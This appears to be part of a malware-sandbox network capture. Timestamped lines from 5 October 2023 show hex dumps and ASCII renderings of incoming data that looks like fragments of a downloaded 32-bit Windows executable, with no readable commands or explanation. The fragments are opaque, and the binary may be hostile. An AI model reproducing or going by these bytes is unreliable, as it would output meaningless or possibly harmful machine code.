2023-10-05 16:48:06 UTC	172	IN	Data Raw: 00 0f 85 ea 01 00 00 81 fd fb 00 00 00 0f 94 c0 c6 44 24 09 ff b9 1a 83 4e 00 bf 15 83 4e 00 0f 44 f9 00 c0 0c fc 88 44 24 0a 88 54 24 0b 8b 06 8b 08 8d 54 24 09 6a 03 52 50 ff 51 08 83 c4 0c 89 46 4c ff 34 24 57 e9 90 01 00 00 bb c8 f2 4c 00 b8 1c f3 4c 00 81 fd fd 00 00 00 0f 85 ff fe ff ff 8b 48 14 8b 54 8e 20 83 fa 03 0f 84 82 00 00 00 83 fa 02 0f 84 bd 00 00 00 85 d2 0f 85 6e 01 00 00 c7 44 8e 20 01 00 00 00 8b 3b 8b 4c 24 0c 31 e1 e8 69 27 07 00 89 f1 89 fa 83 c4 10 5e 5f 5b 5d e9 b9 01 00 00 c7 44 86 20 02 00 00 00 89 df 8b 03 8b 58 04 c6 44 24 09 ff 88 5c 24 0a 88 54 24 0b 8b 06 8b 08 8d 54 24 09 6a 03 52 50 ff 51 08 83 c4 0c 89 46 4c 8d 83 05 ff ff ff 83 f8 03 0f 83 9f 00 00 00 8b 04 9d d4 f0 4c 00 e9 a6 00 00 00 8b 58 04 c6 44 24 09 ff 88 5c 24 Data Ascii: D$NNDD$T$T$jRPQFL4$WLLHT nD ;L$1i'^_[]D XD$\$T$T$jRPQFLLXD$\$
2023-10-05 16:48:06 UTC	180	IN	Data Raw: c4 0c 68 e1 7e 4e 00 56 e8 e4 39 08 00 83 c4 08 bf 01 00 00 00 85 c0 0f 85 38 fb ff ff eb 2e bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 7d 08 00 00 f6 05 78 77 4c 00 03 0f 85 62 08 00 00 83 bc 24 28 10 00 00 00 0f 85 bb f5 ff ff 6a 00 6a 1e ff b4 24 34 10 00 00 e8 04 a2 00 00 83 c4 0c bf 01 00 00 00 e9 eb fa ff ff ff b4 24 24 10 00 00 68 93 03 4f 00 e8 a6 85 fd ff 83 c4 08 55 e8 ed bd 01 00 83 c4 04 bf 02 00 00 00 8b 9c 24 2c 10 00 00 e9 17 f0 ff ff bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 04 08 00 00 f6 05 78 77 4c 00 03 0f 85 e9 07 00 00 83 bc 24 28 10 00 00 00 0f 85 42 f5 ff ff 6a 01 68 ab 00 00 00 ff b4 24 34 10 00 00 e8 88 a1 00 00 83 c4 0c 68 f2 de 4d 00 56 e8 0a 39 08 00 83 c4 08 bf 01 00 00 00 85 c0 0f 85 8a fa ff ff eb 2e bf 01 00 00 00 83 Data Ascii: h~NV98.$(}xwLb$(jj$4$$hOU$,$(xwL$(Bjh$4hMV9.
2023-10-05 16:48:06 UTC	188	IN	Data Raw: 83 c4 08 0f b6 c0 50 68 c8 36 4e 00 55 e8 9f 40 00 00 83 c4 0c 89 e9 ba ca fe 4d 00 6a 01 68 b1 00 00 00 57 e8 f8 04 00 00 83 c4 0c 68 b2 00 00 00 57 e8 ea 7c 00 00 83 c4 08 89 fe bf 02 00 00 00 b9 02 00 00 00 29 c1 51 68 aa ca 4e 00 55 e8 5d 40 00 00 83 c4 0c 68 b3 00 00 00 56 e8 bf 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 80 cc 4e 00 55 e8 39 40 00 00 83 c4 0c 68 b4 00 00 00 56 e8 9b 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 99 cc 4e 00 55 e8 15 40 00 00 83 c4 0c 68 bb 00 00 00 56 e8 77 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 da c7 4e 00 55 e8 f1 3f 00 00 83 c4 0c 68 b5 00 00 00 56 e8 53 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 3d c8 4e 00 55 e8 cd 3f 00 00 83 c4 0c 68 b6 00 00 00 56 e8 2f 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 67 Data Ascii: Ph6NU@MjhWhW\|)QhNU]@hV\|)QhNU9@hV\|)QhNU@hVw\|)QhNU?hVS\|)Qh=NU?hV/\|)Qhg
2023-10-05 16:48:06 UTC	196	IN	Data Raw: 60 4e 00 e8 09 59 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 7a 60 4e 00 55 e8 23 22 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 5d 53 e8 af 63 00 00 83 c4 0c 6a 00 68 56 d8 4d 00 e8 d0 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 56 d8 4d 00 55 e8 ea 21 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 5e 53 e8 76 63 00 00 83 c4 0c 6a 00 68 af dc 4d 00 e8 97 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 af dc 4d 00 55 e8 b1 21 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 66 53 e8 3d 63 00 00 83 c4 0c 6a 01 68 03 f3 4d 00 e8 5e 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 03 f3 4d 00 55 e8 78 21 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 67 53 e8 04 63 00 00 83 c4 0c 6a 00 68 99 dc 4d 00 e8 25 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 99 dc 4d 00 55 e8 3f Data Ascii: `NYtPhz`NU#"Pj]ScjhVMXtPhVMU!Pj^SvcjhMXtPhMU!PjfS=cjhM^XtPhMUx!PjgScjhM%XtPhMU?
2023-10-05 16:48:06 UTC	203	IN	Data Raw: 00 85 c0 74 3e 89 c7 56 50 e8 83 06 00 00 83 c4 08 84 c0 74 25 8d 6e 0c 90 90 90 90 90 90 90 90 90 6a 00 55 e8 98 52 00 00 83 c4 08 56 57 e8 5e 06 00 00 83 c4 08 84 c0 75 e7 57 e8 11 02 00 00 83 c4 04 89 f0 83 c0 0c 6a 00 50 e8 71 52 00 00 83 c4 08 56 e8 d8 60 00 00 83 c4 04 89 43 08 c7 03 01 00 00 00 bf 01 00 00 00 80 38 00 bd 01 00 00 00 74 3a 89 c6 bd 01 00 00 00 90 90 90 90 90 90 68 b0 fe 4d 00 56 e8 a5 db 07 00 83 c4 08 85 c0 74 0e 83 c5 01 89 2b 90 90 90 90 90 90 90 90 90 80 3e 00 8d 76 01 75 f8 80 3e 00 75 d3 83 c5 01 6a 00 6a 04 55 e8 c6 59 00 00 83 c4 0c 89 43 04 c7 00 b0 fe 4d 00 8b 73 08 80 3e 00 74 3f bf 01 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 68 b0 fe 4d 00 56 e8 45 db 07 00 83 c4 08 85 c0 74 0e 8b 43 04 89 34 b8 83 c7 01 90 90 90 Data Ascii: t>VPt%njURVW^uWjPqRV`C8t:hMVt+>vu>ujjUYCMs>t?hMVEtC4
2023-10-05 16:48:06 UTC	211	IN	Data Raw: 74 2b 31 db 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 47 0c 8b 04 98 ff 30 ff 15 f8 2b 50 00 8b 4e 10 89 04 99 83 c3 01 3b 5e 14 72 e4 ff 37 e8 4d 92 00 00 83 c4 04 89 45 00 eb 3c 57 e8 1f 77 00 00 83 c4 04 eb 2e ff 15 e4 2b 50 00 3d 42 27 00 00 74 15 3d f9 2a 00 00 74 15 3d fa 2a 00 00 0f 84 38 ff ff ff 50 eb d4 b8 b0 1e 4e 00 eb 05 b8 93 e5 4d 00 89 46 04 8b 4c 24 20 31 e1 e8 3e 8b 06 00 89 f0 83 c4 24 5e 5f 5b 5d c3 cc cc cc cc 57 56 8b 7c 24 0c 6a 00 68 18 02 00 00 6a 01 e8 9c 3a 00 00 83 c4 0c 89 c6 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 10 00 00 00 00 c7 40 14 00 00 00 00 c7 00 01 00 00 00 83 c0 18 68 00 02 00 00 57 50 e8 6f c2 07 00 83 c4 0c c6 86 17 02 00 00 00 89 f0 5e 5f c3 57 56 8b 7c 24 0c 6a 00 68 18 02 00 00 6a Data Ascii: t+1G0+PN;^r7ME<Ww.+P=B't=t=8PNMFL$ 1>$^_[]WV\|$jhj:@@@@@hWPo^_WV\|$jhj
2023-10-05 16:48:06 UTC	219	IN	Data Raw: 24 08 31 e1 e8 78 6c 06 00 89 d8 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 83 ec 0c 8b 74 24 1c a1 34 00 50 00 31 e0 89 44 24 08 83 3c b5 70 05 4d 00 00 74 17 68 1b 01 00 00 68 b8 50 4f 00 68 72 6c 4f 00 e8 f1 63 07 00 83 c4 0c 8b 7c 24 18 83 3c b5 2c 02 4d 00 02 74 17 68 1c 01 00 00 68 b8 50 4f 00 68 ee 62 4f 00 e8 cc 63 07 00 83 c4 0c 89 34 24 89 e0 6a 00 50 ff 37 e8 a7 3a 00 00 83 c4 0c 89 c6 85 c0 75 17 68 1f 01 00 00 68 b8 50 4f 00 68 04 15 4f 00 e8 9d 63 07 00 83 c4 0c 8b 76 08 8b 4c 24 08 31 e1 e8 c9 6b 06 00 89 f0 83 c4 0c 5e 5f c3 cc 53 57 56 83 ec 0c 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 08 83 3c b5 70 05 4d 00 02 74 17 68 28 01 00 00 68 b8 50 4f 00 68 ac 62 4f 00 e8 50 63 07 00 83 c4 0c 8b 5c 24 24 8b 7c 24 1c Data Ascii: $1xl^_[WVt$4P1D$<pMthhPOhrlOc\|$<,MthhPOhbOc4$jP7:uhhPOhOcvL$1k^_SWVt$ 4P1D$<pMth(hPOhbOPc\$$\|$
2023-10-05 16:48:06 UTC	227	IN	Data Raw: c0 eb 02 31 c0 5e 5f 5b c3 cc cc cc cc cc cc cc cc 53 57 56 8b 74 24 14 85 f6 7e 37 8b 7c 24 18 8b 5c 24 10 01 de 83 c3 01 90 90 90 90 90 90 90 90 0f be 43 ff 50 57 e8 c5 7b 06 00 83 c4 08 85 c0 74 09 8d 4b 01 39 f3 89 cb 72 e5 85 c0 0f 95 c0 eb 02 b0 01 5e 5f 5b c3 cc cc cc cc cc cc cc cc 53 57 56 8b 5c 24 10 8b 7c 24 14 8d 47 01 6a 00 6a 01 50 e8 48 fc ff ff 83 c4 0c 89 c6 57 53 50 e8 9b 74 06 00 83 c4 0c c6 04 3e 00 89 f0 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 8b 7c 24 10 57 e8 10 83 07 00 83 c4 04 50 57 56 e8 95 83 07 00 83 c4 0c 85 c0 0f 94 c0 5e 5f c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 5c 24 14 6a 00 53 e8 50 e1 ff ff 83 c4 08 50 e8 17 53 00 00 83 c4 04 89 c6 68 74 13 4f 00 50 e8 07 85 07 00 83 c4 08 8d 2c Data Ascii: 1^_[SWVt$~7\|$\$CPW{tK9r^_[SWV\$\|$GjjPHWSPt>^_[WVt$\|$WPWV^_USWV\$jSPPShtOP,
2023-10-05 16:48:06 UTC	235	IN	Data Raw: 4b 24 8b 4b 2c 85 c9 0f 84 5f 01 00 00 8b 53 10 89 54 24 10 8b 53 20 89 54 24 14 8b 54 24 10 89 53 0c 8b 54 24 14 89 53 1c 89 4b 28 b9 02 00 00 00 e9 3b 01 00 00 31 db 39 ca 7d 13 eb 1f 80 3c 24 00 74 0b 8d 5d 28 89 1c 24 e9 45 ff ff ff 83 c0 ff 89 c3 8b 44 86 14 01 c7 83 c7 01 8b 44 9e 04 8b 6c 9e 08 8b 4d 04 8b 55 08 89 55 10 8b 55 18 89 55 20 8b 55 24 89 55 2c 89 4d 0c 8b 4d 14 89 4d 1c 89 1c 24 8b 4c 9e 24 89 4d 28 8b 48 08 89 4d 08 8b 50 18 89 55 18 85 c9 74 02 89 29 8b 50 24 89 55 24 8b 58 04 89 5d 04 8b 48 14 89 4d 14 85 db 74 08 89 2b 8b 4d 14 8b 55 24 03 4d 18 03 4d 1c 03 4d 20 83 fa 01 83 d9 ff 83 7d 28 01 83 d9 ff 83 7d 2c 01 83 d9 ff 8b 1c 24 89 4c 9e 18 50 e8 2a dd ff ff 83 c4 04 8b 4c 9e 08 85 c9 0f 84 43 01 00 00 8d 43 01 89 4c 9e 04 8b 4c Data Ascii: K$K,_ST$S T$T$ST$SK(;19}<$t]($EDDlMUUUU U$U,MMM$L$M(HMPUt)P$U$X]HMt+MU$MMM }(},$LP*LCCLL
2023-10-05 16:48:06 UTC	243	IN	Data Raw: ff 66 89 8c 45 52 02 00 00 83 c0 04 3d e0 00 00 00 75 be 8d bd 0c 02 00 00 66 c7 85 0a 03 00 00 7f 00 8d 85 0c 06 00 00 68 00 02 00 00 57 89 44 24 08 50 e8 69 36 06 00 83 c4 0c 8d 85 cc 06 00 00 6a 40 68 0c 09 4d 00 50 e8 53 36 06 00 83 c4 0c 66 c7 85 ca 06 00 00 20 00 31 c0 eb 1b 90 90 90 66 83 f9 20 0f 42 d3 88 94 05 0d 0a 00 00 83 c0 02 3d 00 01 00 00 74 48 0f b7 94 45 0c 02 00 00 8d 5a 81 89 c1 66 83 fb 21 72 05 b9 ff 00 00 00 66 83 fa 20 0f 42 c8 88 8c 05 0c 0a 00 00 0f b7 8c 45 0e 02 00 00 8d 71 81 89 c2 80 c2 01 0f b6 da 89 da 66 83 fe 21 72 a7 ba ff 00 00 00 eb a0 83 7c 24 04 02 0f 83 9f 00 00 00 31 c0 eb 1a 90 81 cb 00 dc 00 00 66 89 5c 45 0c 83 c0 01 3d 00 01 00 00 0f 84 21 01 00 00 0f b7 4c 45 0c 89 ca 81 e2 00 fe 00 00 81 fa 00 dc 00 00 74 dd Data Ascii: fER=ufhWD$Pi6j@hMPS6f 1f B=tHEZf!rf BEqf!r\|$1f\E=!LEt
2023-10-05 16:48:06 UTC	250	IN	Data Raw: cc 8b 44 24 04 8b 4c 24 08 c7 00 02 00 00 00 c7 40 04 e0 f3 43 00 89 48 08 c3 cc cc cc cc cc cc cc 57 56 8b 74 24 1c 8b 7c 24 14 57 e8 d0 25 07 00 83 c4 04 50 57 ff 76 08 e8 83 96 ff ff 83 c4 0c 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 40 6a 01 e8 a5 9e ff ff 83 c4 0c c7 40 2c 00 00 00 00 c7 40 14 00 00 00 00 c7 40 18 00 00 00 00 c7 40 1c 00 00 00 00 c7 40 20 00 00 00 00 c7 40 24 00 00 00 00 c6 00 01 c7 40 0c 00 00 00 00 c7 40 04 00 00 00 00 c6 40 10 00 c6 40 08 00 c7 40 34 00 00 00 00 c7 40 38 00 00 00 00 c7 40 3c 00 00 00 00 c3 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 14 8a 5c 24 1c 8b 6c 24 18 6a 00 6a 0c 6a 01 e8 25 9e ff ff 83 c4 0c 89 c6 89 28 88 58 04 e8 36 a4 ff ff 89 46 08 8d 47 18 6a 00 6a 01 ff 77 14 6a 04 50 ff 77 1c e8 Data Ascii: D$L$@CHWVt$\|$W%PWv^_jj@j@,@@@@ @$@@@@@4@8@<USWV\|$\$l$jjj%(X6FGjjwjPw
2023-10-05 16:48:06 UTC	258	IN	Data Raw: 68 c0 38 4d 00 e8 17 71 00 00 83 c4 04 89 84 24 d4 03 00 00 6a 76 e8 06 71 00 00 83 c4 04 89 84 24 d0 03 00 00 8b 84 24 d4 03 00 00 8b 8c 24 d0 03 00 00 50 51 68 30 fb 43 00 68 d8 32 4e 00 6a 14 6a 73 68 d5 70 4e 00 56 e8 53 79 00 00 83 c4 20 68 4f 00 4e 00 68 81 00 4e 00 ff b4 24 4c 05 00 00 e8 fa 73 00 00 83 c4 0c 6a 00 68 05 2d 4e 00 68 81 00 4e 00 ff b4 24 50 05 00 00 e8 2f 75 00 00 83 c4 10 89 c6 6a 4d e8 93 70 00 00 83 c4 04 89 84 24 cc 03 00 00 8b 84 24 cc 03 00 00 50 68 a0 fa 43 00 68 3c 27 4e 00 6a 75 68 1f 5e 4e 00 56 e8 ea 81 00 00 83 c4 18 6a 4e e8 60 70 00 00 83 c4 04 89 84 24 c8 03 00 00 8b 84 24 c8 03 00 00 50 68 a0 fa 43 00 68 3c 27 4e 00 6a 6b 68 ac 5e 4e 00 56 e8 b7 81 00 00 83 c4 18 6a 4f e8 2d 70 00 00 83 c4 04 89 84 24 c4 03 00 00 8b Data Ascii: h8Mq$jvq$$$PQh0Ch2NjjshpNVSy hONhN$Lsjh-NhN$P/ujMp$$PhCh<'Njuh^NVjN`p$$PhCh<'Njkh^NVjO-p$
2023-10-05 16:48:06 UTC	266	IN	Data Raw: e8 1c 55 00 00 83 c4 0c 68 7d fa 4d 00 68 05 2d 4e 00 68 54 de 4d 00 53 e8 54 56 00 00 83 c4 10 89 c6 6a 00 e8 b8 51 00 00 83 c4 04 89 84 24 c8 01 00 00 8b 84 24 c8 01 00 00 50 68 10 61 44 00 68 16 1a 4e 00 6a 73 68 b9 b5 4e 00 56 e8 9f 5f 00 00 83 c4 18 c7 40 28 0b 00 00 00 6a 2c e8 7e 51 00 00 83 c4 04 89 84 24 c4 01 00 00 8b 84 24 c4 01 00 00 50 68 a0 fa 43 00 68 89 3a 4e 00 6a 6b 68 89 5c 4e 00 56 e8 d5 62 00 00 83 c4 18 68 ed 5a 4e 00 68 05 f1 4d 00 68 54 de 4d 00 53 e8 cd 55 00 00 83 c4 10 89 c6 68 b0 38 4d 00 e8 2e 51 00 00 83 c4 04 89 84 24 c0 01 00 00 6a 1b e8 1d 51 00 00 83 c4 04 89 84 24 bc 01 00 00 8b 84 24 c0 01 00 00 8b 8c 24 bc 01 00 00 50 51 68 30 fb 43 00 68 d4 d9 4d 00 6a 14 6a 74 68 76 e9 4e 00 56 e8 6a 59 00 00 83 c4 20 68 b0 38 4d 00 Data Ascii: Uh}Mh-NhTMSTVjQ$$PhaDhNjshNV_@(j,~Q$$PhCh:Njkh\NVbhZNhMhTMSUh8M.Q$jQ$$$PQh0ChMjjthvNVjY h8M
2023-10-05 16:48:06 UTC	274	IN	Data Raw: cc 53 57 56 83 ec 54 8b 44 24 70 8b 5c 24 6c 8b 7c 24 68 8b 74 24 64 8b 0d 34 00 50 00 31 e1 89 4c 24 50 83 f8 02 74 2b 85 c0 0f 85 b0 00 00 00 6a 02 53 e8 29 25 ff ff 83 c4 08 83 f8 05 75 48 68 aa 75 4e 00 57 56 e8 b5 e5 fd ff 83 c4 0c 6a 40 eb 55 57 56 e8 d7 de fd ff 83 c4 08 89 c7 50 e8 14 98 06 00 83 c4 04 89 c6 57 e8 61 41 ff ff 83 c4 04 6a 02 53 e8 e6 24 ff ff 83 c4 08 83 f8 05 75 41 56 6a 40 eb 3f 68 93 e7 4d 00 57 56 e8 6d e5 fd ff 83 c4 0c 6a 01 53 e8 c2 24 ff ff 83 c4 08 85 c0 74 29 6a 01 53 e8 b3 24 ff ff 83 c4 08 89 e1 50 68 7d 7a 4e 00 51 e8 c2 bd fb ff 83 c4 0c eb 0f 56 6a 01 53 e8 54 2b ff ff eb 0e c6 04 24 00 89 e0 50 57 56 e8 c4 dd fd ff 83 c4 0c 8b 4c 24 50 31 e1 e8 d6 90 05 00 83 c4 54 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: SWVTD$p\$l\|$ht$d4P1L$Pt+jS)%uHhuNWVj@UWVPWaAjS$uAVj@?hMWVmjS$t)jS$Ph}zNQVjST+$PWVL$P1T^_[
2023-10-05 16:48:06 UTC	282	IN	Data Raw: fd ff 83 c4 10 6a 00 68 70 2e 4e 00 53 57 e8 5e c2 fd ff 83 c4 10 83 fe 02 77 12 b8 02 00 00 00 29 f0 50 53 57 e8 57 c5 fd ff 83 c4 0c 5e 5f 5b e9 cc ca fd ff 53 57 e8 b5 c3 fd ff 83 c4 08 85 c0 78 0d 50 53 57 e8 06 c3 fd ff 83 c4 0c eb 05 b8 02 00 00 00 50 ff 77 14 56 e8 82 0c ff ff 83 c4 0c 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 44 24 1c 8b 74 24 18 8b 5c 24 14 8b 7c 24 10 83 f8 03 74 5c 85 c0 0f 85 96 00 00 00 ff 77 14 56 e8 87 05 ff ff 83 c4 08 89 c6 53 57 e8 eb c9 fd ff 83 c4 08 53 57 e8 61 c0 fd ff 83 c4 08 6a 01 68 28 48 4e 00 53 57 e8 b0 c1 fd ff 83 c4 10 6a 00 68 70 2e 4e 00 53 57 e8 9f c1 fd ff 83 c4 10 83 fe 01 74 26 85 f6 75 2f b8 01 00 00 00 eb 1d 53 57 e8 05 c3 fd ff 83 c4 08 85 c0 78 22 50 53 57 e8 56 c2 fd ff 83 c4 0c eb Data Ascii: jhp.NSW^w)PSWW^_[SWxPSWPwV^_[SWVD$t$\$\|$t\wVSWSWajh(HNSWjhp.NSWt&u/SWx"PSWV
2023-10-05 16:48:06 UTC	289	IN	Data Raw: c6 8d 43 14 6a 00 6a 01 ff 73 10 6a 04 50 ff 73 18 e8 4b 03 ff ff 83 c4 18 89 43 18 8b 4b 10 8d 51 01 89 53 10 89 34 88 c7 06 04 00 00 00 c6 46 08 00 8b 43 0c c1 e0 10 05 00 00 ff ff 89 46 0c 8b 44 24 20 89 46 1c 8b 44 24 24 89 46 10 89 6e 14 c7 46 04 00 00 00 00 c7 46 20 00 00 00 00 85 ff 74 0b 57 e8 98 59 ff ff 83 c4 04 eb 02 31 c0 89 46 04 8a 44 24 1c 88 46 24 66 c7 46 25 00 00 89 f0 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 18 8b 5c 24 14 8b 6c 24 28 6a 00 6a 44 6a 01 e8 15 02 ff ff 83 c4 0c 89 c6 8d 43 14 6a 00 6a 01 ff 73 10 6a 04 50 ff 73 18 e8 9b 02 ff ff 83 c4 18 89 43 18 8b 4b 10 8d 51 01 89 53 10 89 34 88 c7 06 05 00 00 00 c6 46 08 00 8b 43 0c c1 e0 10 05 00 00 ff ff 89 46 0c 8b 44 24 20 89 46 1c 8b 44 24 24 89 46 10 89 Data Ascii: CjjsjPsKCKQS4FCFD$ FD$$FnFF tWY1FD$F$fF%^_[]USWV\|$\$l$(jjDjCjjsjPsCKQS4FCFD$ FD$$F
2023-10-05 16:48:06 UTC	297	IN	Data Raw: 7c 24 24 57 e8 f8 d2 01 00 83 c4 28 83 f8 02 74 24 83 f8 01 74 67 85 c0 0f 85 04 01 00 00 8b 44 24 10 85 c0 0f 84 8a 00 00 00 50 68 51 10 4e 00 e9 a7 00 00 00 ff 74 24 10 68 a3 07 4e 00 ff 74 24 40 e8 5a a2 fd ff 83 c4 0c 8b 44 24 40 89 28 8b 44 24 04 89 45 04 68 60 06 42 00 e8 c0 f4 fe ff 83 c4 04 89 45 08 c7 45 14 00 00 00 00 89 7d 00 c7 45 0c 01 00 00 00 e9 a5 00 00 00 ff 74 24 10 68 c1 07 4e 00 ff 74 24 40 e8 12 a2 fd ff 83 c4 0c 8b 44 24 40 c7 00 00 00 00 00 55 e8 6f e3 fe ff 83 c4 04 57 e8 66 e3 fe ff 83 c4 04 8b 74 24 04 eb 6e 8b 44 24 0c 85 c0 74 12 50 68 f3 0f 4e 00 ff 74 24 40 e8 d6 a1 fd ff 83 c4 0c 8b 44 24 08 85 c0 74 12 50 68 bf 0f 4e 00 ff 74 24 40 e8 bc a1 fd ff 83 c4 0c 83 7c 24 04 00 74 17 68 53 08 00 00 68 b8 4d 4f 00 68 76 68 4f 00 e8 Data Ascii: \|$$W(t$tgD$PhQNt$hNt$@ZD$@(D$Eh`BEE}Et$hNt$@D$@UoWft$nD$tPhNt$@D$tPhNt$@\|$thShMOhvhO
2023-10-05 16:48:06 UTC	305	IN	Data Raw: 53 e8 30 09 06 00 83 c4 08 85 c0 74 5d 68 8d 4e 4e 00 53 e8 1e 09 06 00 83 c4 08 85 c0 74 4b 68 75 e5 4e 00 53 e8 0c 09 06 00 83 c4 08 85 c0 b9 00 00 00 00 0f 84 87 fe ff ff 53 e8 39 1b 06 00 83 c4 04 31 c9 85 c0 0f 95 c1 e9 72 fe ff ff 31 ff e9 7c fe ff ff b9 01 00 00 00 e9 61 fe ff ff b9 ff 00 00 00 e9 57 fe ff ff 31 c9 e9 50 fe ff ff c7 04 24 00 96 00 00 c7 44 24 04 00 96 00 00 6a 37 ff 74 24 2c e8 26 a9 fe ff 83 c4 08 89 e1 51 8d 4c 24 08 51 68 9f e1 4d 00 50 e8 d0 90 fb ff 83 c4 10 c6 86 00 01 00 00 01 8b 04 24 89 86 04 05 00 00 c6 86 01 01 00 00 01 8b 44 24 04 89 86 08 05 00 00 8b 4c 24 08 31 e1 e8 f1 13 05 00 89 f0 83 c4 0c 5e 5f 5b 5d c3 68 de 01 00 00 68 a2 42 4f 00 68 a6 8f 4f 00 e8 96 0b 06 00 83 c4 0c e8 8b 9a fb ff cc cc cc cc cc cc cc cc cc Data Ascii: S0t]hNNStKhuNSS91r1\|aW1P$D$j7t$,&QL$QhMP$D$L$1^_[]hhBOhO
2023-10-05 16:48:06 UTC	313	IN	Data Raw: 51 ff 52 08 83 c4 0c 01 c7 53 55 e8 d1 fd fe ff 83 c4 08 eb cc 3b 3c 24 73 0d 8b 46 08 8b 08 57 50 ff 51 0c 83 c4 08 80 7e 5c 00 74 0c 8b 46 04 8b 08 50 ff 51 10 83 c4 04 80 7e 5d 00 74 05 83 c4 0c eb 15 8b 86 88 00 00 00 81 c6 88 00 00 00 6a 00 56 ff 50 14 83 c4 14 5e 5f 5b 5d c3 cc cc cc 8a 44 24 10 0f b6 c0 ff 74 24 18 50 ff 74 24 14 ff 74 24 14 ff 74 24 14 e8 23 76 fe ff 83 c4 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 08 8b 54 24 04 8b 42 80 85 c9 74 03 89 4a 80 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 8b 86 7c ff ff ff 8b 08 50 ff 51 04 83 c4 04 ff 76 8c e8 e3 6f fe ff 83 c4 04 ff 76 84 e8 d8 6f fe ff 83 c4 04 8b 46 d8 85 c0 74 10 8b 08 50 ff 51 08 83 c4 04 c7 46 d8 00 00 00 00 83 7e fc 00 74 19 ff 76 f4 e8 30 70 Data Ascii: QRSU;<$sFWPQ~\tFPQ~]tjVP^_[]D$t$Pt$t$t$#vL$T$BtJWVt$\|PQvovoFtPQF~tv0p
2023-10-05 16:48:06 UTC	321	IN	Data Raw: 00 00 8b 4e 04 89 4c 24 44 8b 08 89 4c 24 30 c7 44 24 34 02 00 00 00 8b 40 04 89 44 24 38 c7 44 24 24 00 00 00 00 c7 44 24 28 01 00 00 00 8d 44 24 3c 89 44 24 2c c7 44 24 18 00 00 00 00 c7 44 24 1c 01 00 00 00 8d 44 24 30 89 44 24 20 8b 45 14 83 f8 01 b8 17 01 00 00 83 d8 00 c7 44 24 14 00 00 00 00 8d 5a 10 8d 4a 08 8d 74 24 08 8d 7c 24 14 56 57 8d 74 24 2c 56 89 5c 24 10 53 89 d3 6a 00 8d 54 24 2c 52 6a 10 6a 00 50 ff 75 10 ff 73 18 51 ff 15 9c 33 50 00 89 03 83 7d 20 00 75 0a 83 7d 24 00 0f 84 f0 00 00 00 8d 44 24 58 50 ff 15 3c da 4f 00 8b 74 24 58 8b 7c 24 5c 89 f0 09 f8 74 29 c7 04 24 00 00 00 00 6a 00 68 80 96 98 00 57 56 e8 a8 d5 04 00 89 c6 89 d7 b8 00 6f ef 49 01 c6 b8 fd ff ff ff 11 c7 eb 07 c7 04 24 00 00 00 00 8b 45 24 8b 4d 20 85 c0 74 06 c7 Data Ascii: NL$DL$0D$4@D$8D$$D$(D$<D$,D$D$D$0D$ ED$ZJt$\|$VWt$,V\$SjT$,RjjPusQ3P} u}$D$XP<Ot$X\|$\t)$jhWVoI$E$M t
2023-10-05 16:48:06 UTC	328	IN	Data Raw: 44 f1 8b 7c 24 24 8b 5c 24 08 8b 8b 84 00 00 00 8b 49 48 50 ff 71 08 ff 71 04 e8 62 a6 ff ff 83 c4 0c 57 56 50 68 fd e1 4d 00 ff b3 ac 00 00 00 e8 6c 36 fd ff 83 c4 14 8b 8c 24 48 05 00 00 31 e1 e8 bb b6 04 00 8b 44 24 1c 81 c4 4c 05 00 00 5e 5f 5b 5d c3 8b 8f 84 00 00 00 8b 49 48 50 ff 71 08 ff 71 04 e8 17 a6 ff ff 83 c4 0c 50 68 94 e6 4d 00 ff b7 ac 00 00 00 e8 23 36 fd ff 83 c4 0c eb b5 8b 73 08 8b 7c 24 08 8b 8f 84 00 00 00 8b 49 48 50 ff 71 08 ff 71 04 e8 e2 a5 ff ff 83 c4 0c 56 50 68 55 e6 4d 00 ff b7 ac 00 00 00 e8 ed 35 fd ff 83 c4 10 e9 7c ff ff ff cc cc cc cc cc 8b 44 24 08 8b 4c 24 04 8b 09 31 d2 3b 48 08 0f 97 c2 b8 ff ff ff ff 0f 43 c2 c3 cc cc cc cc cc 53 57 56 80 79 10 00 0f 85 97 00 00 00 89 ce 8b 19 8b 41 14 8b 49 68 89 c2 83 e2 04 c1 ea Data Ascii: D\|$$\$IHPqqbWVPhMl6$H1D$L^_[]IHPqqPhM#6s\|$IHPqqVPhUM5\|D$L$1;HCSWVyAIh
